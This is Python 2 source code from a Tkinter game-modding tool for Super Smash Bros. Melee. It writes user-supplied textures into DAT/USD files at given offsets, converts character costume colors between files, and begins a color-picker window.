missingTexTypes = ''
nonImages = []
for i in xrange( len(imageFiles) ):
imagePath = imageFiles[i]
fileExt = os.path.splitext( imagePath )[1].lower()
if fileExt == '.png' or fileExt == '.tpl':
imageType, offset, sourceFile = codecBase.parseFilename( os.path.basename( imagePath ) )
if imageType == -1:
missingTexTypes += '\n' + imagePath
continue
# Write the file path and offset (if available) to the appropriate text field.
if offset != -1 and validOffset( str(offset) ): offset = uHex( offset )
else: offset = ''
standardizedPath = imagePath.replace('/', '\\') + ' --> ' + offset
arrowPosFromEnd = len( offset ) + 6
adjustTextAreaWidth( standardizedPath, Gui.imageTextArea )
if i == 0 and len( recallFilepaths() ) == 0: ## i.e. first entry of the text field. (i==0 probably isn't necessary, but short-circuits for efficiency.)
Gui.imageTextArea.insert( 'end', standardizedPath )
else: Gui.imageTextArea.insert( 'end', "\n" + standardizedPath )
# Color the arrow.
Gui.imageTextArea.tag_add('offsetArrow', 'end - ' + str( arrowPosFromEnd ) + ' chars', 'end - ' + str( arrowPosFromEnd - 3 ) + ' chars')
else:
nonImages.append( imagePath )
# If there was exactly one non-image file included, give it the benefit of the doubt that it is a DAT of some kind, and set it as such.
if len(nonImages) == 1: fileHandler( nonImages )
elif len(nonImages) > 1: msg( 'Multiple non-PNG/TPL files were given, which were discarded.' )
# Update the GUI on total textures gathered.
Gui.sourceTexturesText.set( "Texture(s):\n (" + str(len( recallFilepaths() )) + " total)" )
if missingTexTypes != '':
#updateProgramStatus( 'Missing Types!' )
msg("A texture type wasn't found for the following textures (the " + \
'type should appear at the end of the file name, e.g. the "_9" in ' + \
'"IfAll.usd_0x76280_9.png"):\n\n' + missingTexTypes)
def adjustTextAreaWidth( newestPath, targetWidget ):
if len(newestPath) > targetWidget.cget("width"):
targetWidget.config( width=len(newestPath) + 3 )
Gui.mtrTabRow2.update()
Gui.root.geometry( str(Gui.mtrTabRow2.winfo_reqwidth()) + 'x' + str(Gui.root.winfo_height()) )
def recallFilepaths():
filepaths = []
for i in xrange( int(Gui.imageTextArea.index('end-1c').split('.')[0]) ):
line = Gui.imageTextArea.get(str(i+1)+'.0', str(i+2)+'.0-1c').replace( '"', '' )
if line != '': filepaths.append( line )
return filepaths
def onTextAreaKeyUp(event):
# Expand the area for text fields if there is not enough space.
targetWidget = event.widget
lineIndex = targetWidget.index('insert').split(".")[0]
newestPath = targetWidget.get(lineIndex+'.0', str(int(lineIndex)+1)+'.0-1c')
adjustTextAreaWidth(newestPath, targetWidget)
# Color the arrow which points out the offset, if available.
arrowPos = newestPath.find('-->')
if arrowPos != -1:
targetWidget.tag_add('offsetArrow', lineIndex + '.' + str(arrowPos), lineIndex + '.' + str(arrowPos + 3))
# Update the GUI on total textures gathered.
Gui.sourceTexturesText.set("Texture(s):\n (" + str(len(recallFilepaths())) + " total)")
def overwriteImagesManually():
datFilePath = Gui.datDestination.get().replace('"', '')
# Start with a preliminary check that something is given for a DAT filepath and that DAT file can be found.
if datFilePath == '': msg( 'No DAT or USD file has been set.' )
elif not os.path.exists( datFilePath ):
msg( 'The destination file (DAT/USD) could not be found.\n\n(This import method currently only supports standalone files, i.e. those not in a disc.)' )
else:
## Check that something is given for the texture filepaths.
imagePathsAndOffsets = recallFilepaths()
if imagePathsAndOffsets == []: msg( 'No texture(s) selected.' ) #infoText.set('You must add textures above.')
else:
imagesNotFound = ''
offsetsNotFound = ''
unsupportedFiles = ''
missingTypes = ''
generalFailures = ''
datFileToOpen = datFilePath
datFilename, datFileExt = os.path.splitext( os.path.basename(datFileToOpen) )
newDatFilepath = ''
if Gui.mtrSaveBackup.get():
datFileDir = os.path.split( datFilePath )[0]
if '[the hack. v' in datFilename:
nameStartPoint = datFilename.index(']_')
# Separate out the last decimal part from the version number.
version = datFilename[:nameStartPoint].split('v')[1]
if '.' in version: baseVer = datFilename[:nameStartPoint].rsplit('.')[0]
else: baseVer = version
newDatFilepath = datFileDir + '\\[the hack. v' + baseVer + '.' + '1' + datFilename[nameStartPoint:] + datFileExt
fileVersionCount = 1
while os.path.exists( newDatFilepath ):
fileVersionCount += 1
newDatFilepath = datFileDir + '\\[the hack. v' + baseVer + '.' + str(fileVersionCount) + datFilename[nameStartPoint:] + datFileExt
else:
newDatFilepath = datFileDir + '\\[the hack. v1]_' + datFilename + datFileExt
fileVersionCount = 1
while os.path.exists( newDatFilepath ):
fileVersionCount += 1
newDatFilepath = datFileDir + '\\[the hack. v' + str(fileVersionCount) + ']_' + datFilename + datFileExt
# Filepath determined. Try to create the back-up.
try:
shutil.copy(datFilePath, newDatFilepath)
datFileToOpen = newDatFilepath
except:
if not tkMessageBox.askyesno('Proceed without backup?', 'A backup of the ' + datFileExt.upper() + ' file could not be created. \n'
'(You may want to check if the file is read or write\nprotected, or copy the file manually.) \n\n'
'Do you want to proceed with the overwrite anyway?'):
return ## Exit this function without performing any image overwriting.
newDatFilepath = '' # Cleared since a back-up won't be created.
clearHighlighting()
imagesOverwritten = 0
imagesNotOverwritten = 0
palettesCreated = 0
showPaletteWarning = False
with open(datFileToOpen, 'r+b') as datBinary:
## For each image...
for currentLine, imagePathAndOffset in enumerate(imagePathsAndOffsets):
## enumerate starts at 0, but tkinter starts line counts at 1, so increase the enumerated value to match.
currentLine = currentLine + 1
## Check that there is an offset provided for this image.
if '-->' in imagePathAndOffset:
(imageFilepath, offsets) = imagePathAndOffset.split('-->')
## Remove leading and/or trailing whitespace from the variables.
imageFilepath = imageFilepath.strip()
for imageOffset in offsets.split(','):
imageOffset = imageOffset.strip().replace('0x', '').replace('0X', '')
separatedPalette = False
if ':' in imageOffset:
(imageOffset, paletteOffset) = imageOffset.split(':')
imageOffset = imageOffset.strip()
paletteOffset = paletteOffset.strip()
separatedPalette = True
## Confirm that the offsets exists and are each a hexadecimal number.
if validOffset(imageOffset) and (not separatedPalette or validOffset(paletteOffset)): # Third condition only evaluated if separatedPalette = True.
## Check that the current image file can be found.
if os.path.exists( imageFilepath ):
try:
newImage = tplEncoder( imageFilepath, imageType=codecBase.parseFilename( os.path.basename( imageFilepath ) )[0] )
imageData = newImage.encodedImageData
paletteData = newImage.encodedPaletteData
status = 'dataObtained'
except TypeError: # For CMPR (_14) textures; uses wimgt
status, _, imageData, _, paletteData = getImageFileAsTPL( imageFilepath, '' )
except IOError: status = 'formatUnsupported'
except missingType: status = 'imageTypeNotFound'
except: status = 'encodingError'
if status == 'dataObtained' or status == 'dataWithAdHocPalette':
if separatedPalette:
## Convert the offset to base 16 and then use that to seek to the texture location.
datBinary.seek( int(imageOffset, 16) )
datBinary.write( bytearray.fromhex(imageData) )
## Convert the offset to base 16 and then use that to seek to the palette location.
datBinary.seek( int(paletteOffset, 16) )
datBinary.write( bytearray.fromhex(paletteData) )
else:
if paletteData != '':
imageData = imageData + paletteData
## Convert the offset to base 16 and then use that to seek to the texture location.
datBinary.seek( int(imageOffset, 16) )
datBinary.write( bytearray.fromhex(imageData) )
# Perform line highlighting
if status == 'dataObtained':
Gui.imageTextArea.tag_add( 'successfulOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
else:
Gui.imageTextArea.tag_add( 'warningOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
palettesCreated = palettesCreated + 1
showPaletteWarning = True
imagesOverwritten += 1
elif status == 'formatUnsupported':
unsupportedFiles = unsupportedFiles + imageFilepath + '\n'
Gui.imageTextArea.tag_add( 'failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
imagesNotOverwritten += 1
elif status == 'imageTypeNotFound':
missingTypes = missingTypes + imageFilepath + '\n'
Gui.imageTextArea.tag_add( 'failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
imagesNotOverwritten += 1
else:
generalFailures = generalFailures + imageFilepath + '\n'
Gui.imageTextArea.tag_add( 'failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
imagesNotOverwritten += 1
else:
imagesNotFound = imagesNotFound + imageFilepath + '\n'
Gui.imageTextArea.tag_add( 'failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
break
else:
if separatedPalette:
offsetsNotFound = offsetsNotFound + imageFilepath + ' with ' + imageOffset + ':' + paletteOffset + '\n'
Gui.imageTextArea.tag_add( 'failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
else:
offsetsNotFound = offsetsNotFound + imageFilepath + ' with ' + imageOffset + '\n'
Gui.imageTextArea.tag_add( 'failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
else:
offsetsNotFound = offsetsNotFound + imagePathAndOffset + '\n'
Gui.imageTextArea.tag_add('failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c')
## This point is after the image file injection loop and closure of the DAT/USD file.
## If a back-up was created, but no changes were made from the original file, don't keep the new copy.
if imagesOverwritten == 0 and newDatFilepath != '':
try: os.remove( newDatFilepath )
except: pass
if showPaletteWarning == True:
if palettesCreated == 1:
msg('No palette was detected for the texture marked in yellow. It was given one and succefully ' # infoText.set
'written into the ' + datFileExt.replace('.','').upper() + ', however, you will achieve better image quality '
'if you give the texture a palette in your image editor beforehand.')
else:
msg('No palette was detected for the textures marked in yellow. They were given one and succefully '
'written into the ' + datFileExt.replace('.','').upper() + ', however, you will achieve better image quality '
'if you give the textures a palette in your image editor beforehand.') # infoText.set
## Begin creating a completion message of what was done.
if imagesOverwritten == 1:
completionMessage = 'Procedure complete! 1 image in the ' + datFileExt.upper() + ' was overwritten.'
elif imagesOverwritten > 1:
completionMessage = 'Procedure complete! ' + str(imagesOverwritten) + ' images in the ' + datFileExt.upper() + ' were overwritten.'
else:
completionMessage = ''
## Append notification of unprocessed image files (due to no offset info, or unsupported types).
if completionMessage == '' and offsetsNotFound != '':
## (No images were overwritten).
completionMessage = completionMessage + \
'The following images were not processed because proper offsets \n' + \
'were not given or not found:\n\n' + offsetsNotFound
elif offsetsNotFound != '':
## Notification of at least some images being overwritten was appended to the completion message.
completionMessage = completionMessage + \
'\n\nHowever, the following images were not processed because \n' + \
'proper offsets were not given or not found:\n\n' + offsetsNotFound
## Append notification of image files not found.
if imagesOverwritten == 0 and offsetsNotFound == '' and imagesNotFound != '':
## No previous messages have been appended to the completion message (no images were overwritten, yet offsets were given).
completionMessage = completionMessage + 'The image files were not found.'
elif imagesOverwritten > 0 and offsetsNotFound == '' and imagesNotFound != '':
completionMessage = completionMessage + '\n\nHowever, the following image files were not found:\n\n' + imagesNotFound
elif offsetsNotFound != '' and imagesNotFound != '':
completionMessage = completionMessage + \
'\n\nAlso, the following image files were not found:\n\n' + imagesNotFound
## Append notification of images not processed due to unsupported file types or image formats.
if unsupportedFiles != '':
completionMessage = completionMessage + \
"\n\nThe following images were not written in because the image doesn't\n" + \
"have correct formatting for a .TPL or .PNG (you might want to\n" + \
"try getting a new copy of the image):\n\n" + unsupportedFiles
if missingTypes != '':
completionMessage = completionMessage + \
"\n\nAn image type wasn't found for the following images\n" + \
'(the type should appear at the end of the file name, e.g. the "_2" in' + \
'"MnSlMap.usd_0x38840_2.png"):\n\n' + missingTypes
updateProgramStatus( 'Missing Types!' )
if generalFailures != '':
completionMessage = completionMessage + \
"\n\nThe following images failed to import due to an encoding error:\n\n" + generalFailures
updateProgramStatus( 'Failed Imports!' )
if imagesNotOverwritten > 0: updateProgramStatus( 'Failed Imports' )
else: updateProgramStatus( 'Import Successful' )
msg(completionMessage)
def clearHighlighting():
Gui.imageTextArea.tag_remove('successfulOverwrite', '1.0', 'end')
Gui.imageTextArea.tag_remove('warningOverwrite', '1.0', 'end')
Gui.imageTextArea.tag_remove('failedOverwrite', '1.0', 'end')
#===================================#
# ~ ~ Character Color Converter ~ ~ #
#===================================#
def cccSelectStandalone( role ):
filepath = tkFileDialog.askopenfilename(
title="Choose a character texture file.",
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
filetypes=[ ('Texture data files', '*.dat *.usd *.lat *.rat'), ('All files', '*.*') ]
)
if filepath != '' and os.path.exists( filepath ):
# Get the DAT data and relocation table from the target file.
with open( filepath , 'rb') as binaryFile:
datHex = binaryFile.read().encode( 'hex' )
prepareColorConversion( filepath, datHex, role )
def cccPointToDiscTab():
Gui.mainTabFrame.select( Gui.discTab )
if globalDiscDetails['isoFilePath'] == '': promptToOpenFile( 'iso' )
else: scrollToSection( 'Characters' )
def prepareColorConversion( filepath, datHex, role ): # datHex includes the file header
rtStart = int( datHex[8:16], 16 ) # Size of the data block
rtEntryCount = int( datHex[16:24], 16 )
rootNodeCount = int( datHex[24:32], 16 )
referenceNodeCount = int( datHex[32:40], 16 )
rtEnd = rtStart + (rtEntryCount * 4)
rootNodesEnd = rtEnd + (rootNodeCount*8)
tempFileHeader = datHex[:64]
datHex = datHex[64:] # Removes the header
stringTable = datHex[rootNodesEnd*2 + (referenceNodeCount *16):]
firstString = stringTable.decode('hex').split('\x00')[0] # Strings separated by stop byte, '\x00'
# Validate the parsing, and therefore also the file.
if not firstString[:3] == 'Ply': msg( "This file doesn't appear to be a character costume!" )
elif '5K' not in firstString:
if 'Kirby' in firstString: msg( "Only Kirby's base color files are supported (e.g. 'PlKbBu'). "
"You'll have to modify this one manually. Luckily, none of his files have many textures." )
else: # If here, this must be Master/Crazy Hand, or one of the Fighting Wire Frames.
msg( "This character doesn't have multiple color files. \nThere is nothing to convert." )
else:
# Parse string....
charKey, colorKey = firstString[3:].split( '5K' )
if colorKey.startswith('_'): colorKey = 'Nr'
else: colorKey = colorKey.split('_')[0]
# Check if the filepath is actually a path to a file, or is actually the iid for a file in a disc.
if not Gui.isoFileTree.exists( filepath ):
# Update the default search directory.
dirPath = os.path.dirname( filepath )
with open( settingsFile, 'w') as theSettingsFile:
#if not settings.has_section('General Settings'): settings.add_section('General Settings')
settings.set( 'General Settings', 'defaultSearchDirectory', dirPath )
settings.write( theSettingsFile ) # Updates a pre-existing settings file entry, or just creates a new file.
if charKey == 'Gamewatch': msg( 'Game & Watch has no textures to swap!' )
if charKey == 'Gkoopa': msg( 'Giga Bowser only has one color file! \nThere is nothing to convert.' )
elif charKey == 'Peach' and colorKey == 'Ye':
msg("Peach's yellow costume has too many differences from the other colors to map. You'll need to convert this costume manually. (Using the DAT Texture Tree tab to "
"dump all textures from the source file, and then you can use those to replace the textures in the destination file. Although there are likely textures "
"that do not have equivalents.) Sorry about that; this is actually the only character & color combination not supported by this tool.")
elif charKey not in CCC or colorKey not in CCC[charKey]:
# Failsafe scenario. Shouldn't actually be able to get here now that everything besides yellow Peach (handled above) should be mapped.
msg( 'This character or color is not supported. \n\nID (first root node string): ' + firstString + \
'\n\nCharacter key found: ' + str(charKey in CCC) + '\nColor key found: ' + str(colorKey in charColorLookup) )
else:
# Get an image that is greyscale with alpha
insigniaPath = imagesFolder + "\\universe insignias\\" + CCC[charKey]['universe'] + ".png"
greyscaleInsignia = Image.open( insigniaPath ).convert('L')
# Look up the color to use for the insignia
insigniaColor = charColorLookup[colorKey]
if insigniaColor == 'neutral': insigniaColor = ( 210, 210, 210, 255 )
# Create a blank canvas, and combine the other images onto it
blankImage = Image.new( 'RGBA', greyscaleInsignia.size, (0, 0, 0, 0) )
colorScreen = Image.new( 'RGBA', greyscaleInsignia.size, insigniaColor ) #(0, 0, 255, 255)
completedInsignia = ImageTk.PhotoImage( Image.composite( blankImage, colorScreen, greyscaleInsignia) )
if role == 'source':
Gui.cccSourceCanvas.delete('all')
Gui.cccSourceCanvas.insigniaImage = completedInsignia
# Attache the images to the canvas
Gui.cccSourceCanvas.create_image( 0, 0, image=Gui.cccSourceCanvas.insigniaImage, anchor='nw' )
#font=tkFont.Font(family='TkDefaultFont', size=9, weight='bold')
Gui.cccSourceCanvas.create_text( Gui.cccIdentifiersXPos, 20, anchor='w', fill=Gui.globalFontColor, font="-weight bold -size 10", text='Character: ' + CCC[charKey]['fullName'])
Gui.cccSourceCanvas.create_text( Gui.cccIdentifiersXPos, 44, anchor='w', fill=Gui.globalFontColor, font="-weight bold -size 10", text='Costume Color: ' + charColorLookup[colorKey].capitalize())
CCC['dataStorage']['sourceFile'] = filepath
CCC['dataStorage']['sourceFileChar'] = charKey
CCC['dataStorage']['sourceFileColor'] = colorKey
CCC['dataStorage']['sourceFileHeader'] = tempFileHeader
CCC['dataStorage']['sourceFileData'] = datHex
else:
Gui.cccDestCanvas.delete('all')
Gui.cccDestCanvas.insigniaImage = completedInsignia
# Attache the images to the canvas
Gui.cccDestCanvas.create_image( 0, 0, image=Gui.cccDestCanvas.insigniaImage, anchor='nw' )
#font=tkFont.Font(family='TkDefaultFont', size=9, weight='bold')
Gui.cccDestCanvas.create_text( Gui.cccIdentifiersXPos, 20, anchor='w', fill=Gui.globalFontColor, font="-weight bold -size 10", text='Character: ' + CCC[charKey]['fullName'])
Gui.cccDestCanvas.create_text( Gui.cccIdentifiersXPos, 44, anchor='w', fill=Gui.globalFontColor, font="-weight bold -size 10", text='Costume Color: ' + charColorLookup[colorKey].capitalize())
CCC['dataStorage']['destFile'] = filepath
CCC['dataStorage']['destFileChar'] = charKey
CCC['dataStorage']['destFileColor'] = colorKey
CCC['dataStorage']['destFileHeader'] = tempFileHeader
CCC['dataStorage']['destFileData'] = datHex
def convertCharacterColor():
# Make sure there's data collected on the source and destination files.
sourceFilepath = CCC['dataStorage']['sourceFile']
destFilepath = CCC['dataStorage']['destFile']
if sourceFilepath == '' or destFilepath == '': msg( 'You must provide both a source and destination file.' )
else:
# Collect the rest of the stored data on the source and destination files.
sourceCharKey = CCC['dataStorage']['sourceFileChar']
sourceColorKey = CCC['dataStorage']['sourceFileColor']
sourceDatHex = CCC['dataStorage']['sourceFileData']
destCharKey = CCC['dataStorage']['destFileChar']
destColorKey = CCC['dataStorage']['destFileColor']
destFileHeader = CCC['dataStorage']['destFileHeader']
destDatHex = CCC['dataStorage']['destFileData']
if not sourceCharKey == destCharKey: msg( 'Both files must be for the same character.', '''"I can't let you do that, Star Fox!"''' )
elif sourceColorKey == destColorKey: msg( 'These character costumes are for the same color!\n There is nothing to convert.' )
else:
sourceBlocks = CCC[sourceCharKey][sourceColorKey]
destBlocks = CCC[destCharKey][destColorKey]
# For each mapped block of texture data for the character files, replace the data block in the destination file with the data block from the source file.
skipNextBlock = False
unmodifiedBlocks = []
for blockIteration in xrange( len(sourceBlocks) ):
sourceBlockStart, sourceBlockEnd = sourceBlocks[blockIteration]
sourceBlockStart -= 0x20 # For file header compensation.
sourceBlockEnd -= 0x20
sourceBlockLength = sourceBlockEnd - sourceBlockStart
destBlockStart, destBlockEnd = destBlocks[blockIteration]
destBlockStart -= 0x20 # For file header compensation.
destBlockEnd -= 0x20
destBlockLength = destBlockEnd - destBlockStart
# Skip copying palette headers if the previous block (probably a block of texture and/or palette data) was skipped.
if skipNextBlock:
skipNextBlock = False
if destBlockLength == 0x1C:
print 'block skipped:', uHex(sourceBlockStart + 0x20)
continue
# Skip any untranslatable blocks of data, but notify the user that they were not changed.
if sourceBlockLength == destBlockLength:
# Replace the data blocks.
destDatHex = replaceHex( destDatHex, destBlockStart, sourceDatHex[sourceBlockStart*2:sourceBlockEnd*2] )
elif destBlockLength > 0x1C: # Excludes reporting of palette header blocks.
unmodifiedBlocks.append( destBlocks[blockIteration] )
print 'block', uHex(destBlocks[blockIteration][0]) + ', ' + uHex(destBlocks[blockIteration][1]), 'queuing skip'
skipNextBlock = True
# Conversion has completed. Check whether the destination file is from a disc or a standalone file, and save the new file data accordingly.
if Gui.isoFileTree.exists( destFilepath ): # 'destFilepath' will actually be an iid in this case.
_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( destFilepath, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
Gui.isoFileTree.item( destFilepath, values=('Converted and ready to be replaced...', entity, isoOffset, fileSize, isoPath, 'ram', destFileHeader + destDatHex), tags='changed' )
#Gui.mainTabFrame.select( Gui.discTab )
global unsavedDiscChanges
unsavedDiscChanges.append( os.path.basename(sourceFilepath) + ' converted and ready for import.' )
else:
writeDatFile( destFilepath, bytearray.fromhex(destFileHeader + destDatHex), 'Conversion' )
Gui.cccOpenConvertedFileButton['state'] = 'normal'
updateProgramStatus( 'Conversion Complete' )
# Alert the user of any areas that still need to be manually replaced.
if unmodifiedBlocks != []:
cmsg("Some textures could not be replaced, due to differences in the textures' properties between the two files (such as having different resolutions or " \
'differently sized palettes). Textures that were able to be copied over have been transferred. However, the textures in the following ranges will still need ' \
'to be replaced. (You can click on the "Offset (len)" column header on the DAT Texture Tree tab to view textures in the order that they appear in the file.):\n\n' + \
'\n'.join( [uHex(block[0]) + ' to ' + uHex(block[1]) for block in unmodifiedBlocks] ), 'Some Manual Transfers Required' )
# Contingency messages.
if sourceCharKey == 'Kirby':
cmsg("Most textures have been copied over, however his eye textures will need to be done manually.")
elif sourceCharKey == 'Mewtwo' and sourceColorKey == 'Nr':
cmsg("The source textures have been copied over. However, note that Mewtwo's Neutral costume has an extra eye texture (at 0x2f440 to 0x31440) that " \
"doesn't exist or have an equivalent in the other colors. So it will not be included in the destination file/costume.")
elif destCharKey == 'Mewtwo' and destColorKey == 'Nr':
cmsg("Mewtwo's Neutral costume has an extra eye texture (at 0x2f440 to 0x31440), which doesn't exist or have an equivalent in the other colors. So " \
"although the rest of the textures have been copied, you'll need to replace this texture manually (you can try using one of the other eye textures, " \
"or create a new one).")
elif destCharKey == 'Pichu' and destColorKey == 'Bu':
cmsg("Pichu's body and eye textures have been transferred over. However, Pichu's alternate colors each have an extra part to its model, which each " \
"have unique textures (i.e. no equivalents in the other costume files). For its Blue alt, this would be its goggles, whose textures " \
"extend from 0x16800 to 0x1E800 (7 textures), and 0x28820 and 0x28C20 (1 texture). You'll need to update these manually if you want to change them.")
elif destCharKey == 'Pichu' and destColorKey == 'Gr':
cmsg("Pichu's body and eye textures have been transferred over. However, Pichu's alternate colors each have an extra part to its model, which each " \
"have unique textures (i.e. no equivalents in the other costume files). For its Green alt, this would be its backpack, whose textures " \
"extend from 0x17320 to 0x2C320 (13 textures), and 0x35B20 to 0x3DB20 (1 texture). You'll need to update these manually if you want to change them.")
# elif destCharKey == 'Pichu' and destColorKey == 'Nr':
# cmsg("Pichu's body (and eye) textures have been transferred over. However, Pichu's alternate colors each have an extra part to its model, which each " \
# "have unique textures (i.e. no equivalents in the other costume files). Thus, these textures won't be touched.")
elif destCharKey == 'Pichu' and destColorKey == 'Re':
cmsg("Pichu's body and eye textures have been transferred over. However, Pichu's alternate colors each have an extra part to its model, which each " \
"have unique textures (i.e. no equivalents in the other costume files). For its Red alt, this would be its scarf, whose textures " \
"extend from 0x21200 to 0x25200 (2 textures). You'll need to update these manually if you want to change them.")
elif destCharKey == 'Pikachu' and destColorKey == 'Bu':
cmsg("Pikachu's body and eye textures have been transferred over. However, due to variations among its hats, you'll need to update the textures " \
"for those manually if you want to change them. For Pikachu's Blue alt, this would be its magician's hat, whose textures " \
"extend from 0x15860 to 0x19860 (2 textures).")
elif destCharKey == 'Pikachu' and destColorKey == 'Gr':
cmsg("Pikachu's body and eye textures have been transferred over. However, due to variations among its hats, you'll need to update the textures " \
"for those manually if you want to change them. For Pikachu's Green alt, this would be its fedora, whose textures " \
"extend from 0x15f60 to 0x19f60 (2 textures).")
elif destCharKey == 'Pikachu' and destColorKey == 'Re':
cmsg("Pikachu's body and eye textures have been transferred over. However, due to variations among its hats, you'll need to update the textures " \
"for those manually if you want to change them. For Pikachu's Red alt, this would be Red's hat, whose textures " \
"extend from 0x152a0 to 0x1baa00 (3 textures).")
elif destCharKey == 'Purin' and destColorKey == 'Bu':
cmsg("Jigglypuff's body and eye textures have been transferred over. However, due to variations among its head pieces, you'll need to update the textures " \
"for those manually if you want to change them. For Jigglypuff's Blue alt, this would be the bow, whose textures " \
"extend from 0x3e2e0 to 0x3e320 (2 textures).")
elif destCharKey == 'Purin' and destColorKey == 'Gr':
cmsg("Jigglypuff's body and eye textures have been transferred over. However, due to variations among its head pieces, you'll need to update the textures " \
"for those manually if you want to change them. For Jigglypuff's Green alt, this would be the bandana, whose textures " \
"extend from 0x3caa0 to 0x3dac0 (3 textures).")
elif destCharKey == 'Purin' and destColorKey == 'Re':
cmsg("Jigglypuff's body and eye textures have been transferred over. However, due to variations among its head pieces, you'll need to update the textures " \
"for those manually if you want to change them. For Jigglypuff's Red alt, this would be the flower, whose textures " \
"extend from 0x3b760 to 0x3d760 (1 texture).")
elif destCharKey == 'Purin' and destColorKey == 'Ye':
cmsg("Jigglypuff's body and eye textures have been transferred over. However, due to variations among its head pieces, you'll need to update the textures " \
"for those manually if you want to change them. For Jigglypuff's Yellow alt, this would be the crown, whose textures " \
"extend from 0x3b420 to 0x3fc20 (5 textures).")
def openConvertedCharacterFile():
""" This function is used by the Character Color Converter (CCC) tab, for opening a finished/converted costume file in
the DAT Texture Tree tab. This is useful for making sure the conversion was successful and the new textures are intact. """
destFilepath = CCC['dataStorage']['destFile']
if Gui.isoFileTree.exists( destFilepath ):
loadFileWithinDisc( destFilepath ) # 'destFilepath' will actually be an iid in this case.
else:
fileHandler( [destFilepath] )
#======================#
# ~ ~ Tool Modules ~ ~ #
#======================#
class MeleeColorPicker( object ):
windows = {} # Used to track multiple windows for multiple palette entries. New windows will be added with a windowId = palette entry's canvas ID
recentColors = [] # Colors stored as tuples of (r, g, b, a)
windowSpawnOffset = 0
def __init__( self, title='Color Converter', initialColor='ACACAC7F', defaultTplFormat=5, windowId='', datDataOffsets=() ):
self.title = title
self.initialColor = initialColor.upper()
self.currentHexColor = self.initialColor
self.currentRGBA = hex2rgb( self.initialColor )[0]
self.tplHex = tplEncoder.encodeColor( defaultTplFormat, self.currentRGBA )
self.windowId = windowId
self.datDataOffsets = datDataOffsets # ( rgbaColor, paletteEntry, paletteEntryOffset, imageDataOffset ) | paletteEntry is the original palette color hex
self.lastUpdatedColor = '' # Used to prevent unncessary/redundant calls to update the displayed texture
if self.windowId in self.windows: pass #MeleeColorPicker.windows[self.windowId].window.deiconify()
else:
self.createWindow( defaultTplFormat )
# If windowId, remember it so it can be referenced later (by deiconify)
if self.windowId: self.windows[self.windowId] = self
self.window.deiconify()
def createWindow( self, defaultTplFormat ):
self.window = Tk.Toplevel( Gui.root )
self.window.title( self.title )
self.window.attributes( '-toolwindow', 1 ) # Makes window framing small, like a toolbox/widget.
self.window.resizable( width=False, height=False )
self.window.wm_attributes( '-topmost', 1 )
self.window.protocol( 'WM_DELETE_WINDOW', self.cancel ) # Overrides the 'X' close button.
# Calculate the spawning position of the new window
rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
newWindowX = rootDistanceFromScreenLeft + 180 + self.windowSpawnOffset
newWindowY = rootDistanceFromScreenTop + 180 + self.windowSpawnOffset
self.window.geometry( '+' + str(newWindowX) + '+' + str(newWindowY) )
self.windowSpawnOffset += 30
if self.windowSpawnOffset > 150: self.windowSpawnOffset = 15
# Populate the window
mainFrame = Tk.Frame( self.window )
# Show any remembered colors
if self.recentColors:
self.recentColorImages = []
self.itemColors = {}
if len( self.recentColors ) < 13: canvasHeight = 19
else: canvasHeight = 38
ttk.Label( mainFrame, text='Recent Colors:' ).pack( anchor='w', padx=16, pady=4 )
self.colorsCanvas = Tk.Canvas( mainFrame, borderwidth=2, relief='ridge', background='white', width=197, height=canvasHeight )
self.colorsCanvas.pack( pady=4 )
x = 10
y = 9
for i, rgbaColor in enumerate( reversed(self.recentColors) ):
# Prepare and store an image object for the color
colorSwatchImage = Image.new( 'RGBA', (8, 8), rgbaColor )
colorSwatchWithBorder = ImageOps.expand( colorSwatchImage, border=1, fill='black' )
self.recentColorImages.append( ImageTk.PhotoImage(colorSwatchWithBorder) )
# Draw the image onto the canvas.
itemId = self.colorsCanvas.create_image( x, y, image=self.recentColorImages[i], anchor='nw', tags='swatches' )
self.itemColors[itemId] = rgbaColor
x += 16
if i == 11: # Start a new line
x = 10
y += 16
self.colorsCanvas.tag_bind( 'swatches', '<1>', self.restoreColor )
def onMouseEnter(e): self.colorsCanvas['cursor']='hand2'
def onMouseLeave(e): self.colorsCanvas['cursor']=''
self.colorsCanvas.tag_bind( 'swatches', '<Enter>', onMouseEnter )
self.colorsCanvas.tag_bind( 'swatches', '<Leave>', onMouseLeave )
# RGB Channels
ttk.Label( mainFrame, text='Choose the RGB Channel values:' ).pack( anchor='w', padx=16, pady=4 )
curtainFrame = Tk.Frame( mainFrame, borderwidth=2, relief='ridge', width=250, height=50, cursor='hand2' )
whiteCurtain = Tk.Frame( curtainFrame, bg='white', width=25, height=50 )
whiteCurtain.pack( side='left' )
focusColorsFrame = Tk.Frame( curtainFrame, width=200, height=50 )
# Combine the initial color with the defalt background color, to simulate alpha on the colored frame (since Frames don't support alpha)
bgColor16Bit = Gui.root.winfo_rgb( focusColorsFrame['bg'] )
self.nativeBgColor = ( bgColor16Bit[0]/256, bgColor16Bit[1]/256, bgColor16Bit[2]/256 ) # Reduce it to an 8-bit colorspace
newColors = []
alphaBlending = round( self.currentRGBA[-1] / 255.0, 2 )
for i, colorChannel in enumerate( self.nativeBgColor ):
newColors.append( int(round( (alphaBlending * self.currentRGBA[i]) + (1-alphaBlending) * colorChannel )) )
originalColorBg = rgb2hex( newColors )
if getLuminance( originalColorBg + 'ff' ) > 127: fontColor = 'black'
else: fontColor = 'white'
self.originalColor = Tk.Frame( focusColorsFrame, bg=originalColorBg, width=200, height=25 )
Tk.Label( self.originalColor, text='Original Color', bg=originalColorBg, foreground=fontColor ).pack()
self.currentRgbDisplay = Tk.Frame( focusColorsFrame, width=200, height=25 ) # , bg='#ACACAC'
Tk.Label( self.currentRgbDisplay, text='New Color' ).pack()
focusColorsFrame.pack( side='left' )
